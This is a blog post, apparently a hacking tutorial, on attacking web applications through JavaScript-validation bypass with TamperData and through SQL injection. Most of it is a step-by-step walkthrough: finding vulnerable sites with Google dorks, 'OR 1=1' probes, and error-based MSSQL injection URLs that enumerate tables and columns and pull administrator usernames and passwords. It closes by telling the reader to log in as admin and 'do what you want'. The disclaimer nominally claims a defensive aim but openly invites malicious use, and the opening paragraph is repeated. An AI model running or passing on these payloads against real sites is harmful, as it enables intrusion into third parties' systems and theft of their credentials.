Disclaimer: The knowledge you gain from this blog is solely intended to help web developers secure their web applications and websites. I distance myself from any harm/damages you inflict on any 3rd party's property. USE THIS KNOWLEDGE WITH MALICIOUS INTENT AT YOUR OWN DISCRETION
Not all web applications are hackable, but most web applications are hackable!
How can you detect a hackable web application? By hackable, I mean SQL Injection in to a site. Normally, the hacker starts with simple injected queries to retrieve the names of tables, then narrows down to the administrator table, for column names. This is followed by querying for 1 username and password with administrative rights. If the password is encrypted, then 3rd party softwares come in handy in decoding the password.
So, at a glance, how can one detect if a web application is hackable?
Not all web applications are hackable, but most web applications are hackable!
How can you detect a hackable web application? By hackable, I mean SQL Injection in to a site. Normally, the hacker starts with simple injected queries to retrieve the names of tables, then narrows down to the administrator table, for column names. This is followed by querying for 1 username and password with administrative rights. If the password is encrypted, then 3rd party softwares come in handy in decoding the password.
So, at a glance, how can one detect if a web application is hackable?
- watch the url, if it uses parameters, then chances are high that it is vulnerable at one point or another
- if it has user input fields, eg contact us page, login page, etc. chances are that a hacker can input sql statements and terminate at his own discretion
- if the site uses too much of java script validation, chances are that the programmer might have forgotten to validate on the server, and as such, 3rd party tools such as "Tamper Data" really come in handy for the hacker.
- Use a highly configurable browser like FireFox with a few neat plugins, eg TamperData. Ensure that all popups that the site opens for us are NOT hiding their status bar or their URL bar, as the URL of the popup contains GET data, that is data such as www.hackedsite.co.ke/popup.aspx?blah=14 If we had the URL not visible for popups we wouldn't see these clues
- lets get the security-awareness level of the web designer.Open up the source code (right-click page==>view source) and look for things such as "Made with Frontpage" and other such stuff that would indicate it's someone who knows little about making websites. Also, always remember on PHP pages/ASP(X) pages sometimes in the source code you can find PHP/ASP(X) code commented out in such a way (i.e. the <!-- HTML way) that you get to see non-functional code on the webpage, which can always be a help to the inner workings of the website.
- Check if they're using lots of java script validation.
- On the login page, enter a script like <script>alert('HI'); </script>
- Hit the login button. If the popup HI appears, they're using javascript validation.
- This is where TamperData comes into play (google a bit to know more about this tool, YOU WILL LOVE IT)
- Go back to the form and enter username/password (wrong or valid). Turn on TamperData and hit OK on the form. At this stage what will happen is the Javascript will run as normal and everything will be validate as OK.... but just as the data is about to passed over to the webserver TamperData will pop up asking if you want to Tamper (edit) the data being sent, or if you want to just send it. Hit Tamper.
- If you tampered with the data and you are good in javaScript, then you can write as much java script as you wish to have your effects on that site in question. That is a brief on javascript injection.
- Now, let me indulge in the more common but complex injection, SQL Injection.
- This can be entered into the URL or forms. Normally achieved through adding personalised/malicious sql statements into fields requiring user input, and subsequently terminating the web developers sql statements. that way, the hackers sql statements are executed while the authentic sql statement is ignored, as just a comment.
- Lets assume you were browsing and came across a URL similar to this www.hackedSite.co.ke/profiles.aspx?id=23
- The last part of the url id=23 will eventually be executed in the DBMS (eg SQL database). So, all a hacker needs is append their sql statement and execute
- Insert non-numeric data in obvious numeric field or leave blank as shown below:
www.hackedSite.co.ke/profiles.aspx?id=54544www.hackedSite.co.ke/profiles.aspx?id= The above results in a blank windowInsertan alphabetic value in the field egwww.hackedSite.co.ke/profiles.aspx?id=AThe above results inSQL error stating invalid value or similar so id is a numeric field in the databaseThe above was supposed to give us a hint on the data type of the columnNow try this:www.hackedSite.co.ke/profiles.aspx?id=2%20OR%201=1 (I hope you arefamiliar with URL encoding/decoding)The above is similar to"id=2 OR 1=1"- Since 1 will always be equal to 1, then that query will return all records in the profiles table.
- Assuming the hacker does not know the names of tables and columns in the table, on a vulnerable site, the hacker can actually retrieve and use this information. The following section demonstrates this;
- Find the vulnerable site using google dorks e.g. www.vulnerablesite.com/gallery.aspx?id=10'
- The ' sign at the end of the url is supposed to generate errors, hence indicating it is a vulnerable site
- Finding Out The Table Names eg www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,
(select top 1 table_name from information_schema.tables)) - The above code executes the second query and retrieves the first table name from the
database. the windows server cant convert character value into data type. so we will
get an error, from which we can get the first table name. If that table is not the one you want, find out the next table name in the database. Use the following query www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name'))) replace the first_table_name with the actual table name we got above. - Still if we don't get our desired table, we will continue the procedure until we get the desired table name. Now the query should look like this: www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name'))) Replace first_table_name and second_table_name with the table names you got in the above steps.
- Finding Out The Columns, since we already have the table we need. Edit the URL to the following: www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table'))
- If the first column is not related to our desired column names, then follow the steps as
we have done with the table names i.e. www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table' and column_name not in('first_column_name'))) - ALMOST THERE: Extracting The Data: After knowing the columns, we need to extract the data such as user names and passwords.
- Use the following query for user name: www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))
- Use the following query for password: www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_password from admin_table))
- WE'RE DONE. Now use the username and password to log into the website, as the site administrator. Now do what you want with that website/web application
